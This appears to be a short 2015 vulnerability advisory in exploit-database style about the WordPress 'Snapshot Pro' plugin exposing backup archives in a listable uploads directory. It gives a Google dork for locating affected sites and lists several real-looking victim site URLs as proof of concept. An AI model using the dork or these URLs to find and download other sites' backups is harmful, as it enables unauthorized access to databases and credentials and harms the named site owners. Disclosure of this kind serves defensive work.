# WordPress 'Snapshot Pro' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://premium.wpmudev.org/project/snapshot/
# Google Dork: "Index of" +/wp-content/uploads/snapshots/
# PoC :
http://trapshootingonXline.com/wp-content/uploads/snapshots/"RANDOM DIR"/"NAME OF BACKUP"
http://trapshootingoXnline.com/wp-content/uploads/snapshots/
http://forsythchurcXhofchrist.net/wp-content/uploads/snapshots/
http://www.bardoXlatry.com/wp-content/uploads/snapshots/4ljtmn0hfg0kvmifobvrfdsdv2/
# Xploit:
After using Dork Google("Index of" +/wp-content/uploads/snapshots/), we can access directory of backup freely ("/wp-content/uploads/snapshots/"), and All of backups will be there to download(Compress .tar.gz).